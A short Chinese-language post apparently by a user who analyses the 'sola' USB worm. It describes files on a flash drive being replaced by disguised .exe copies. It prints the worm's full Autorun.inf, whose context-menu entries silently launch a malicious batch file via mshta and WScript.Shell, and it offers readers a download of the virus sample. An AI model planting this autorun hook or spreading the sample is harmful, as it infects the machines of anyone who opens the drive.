sola病毒样本

      前些日子别人把U盘借去用，用了之后发现U盘里面所有的jpg变成jpg.exe，wrod变成word.exe；仔细检查U盘发现我的U盘下面Autorun.inf免疫文件下面还有一个Autorun.inf，里面的文件为：

SOLA_1.0_2.0
[autorun]
shell\打开(&O)\command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
shell=打开(&O)
shell\open=复制磁盘(&C)
shell\open\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"

 

 

右键解压【新建 文本文档.exe】变成一个文件夹【新建 文本文档】，如上图所示，里面有一个恶意的批处理文件，真正想要的文件也在里面。有兴趣的同志可以下载【sola病毒样本.rar】，自己去研究。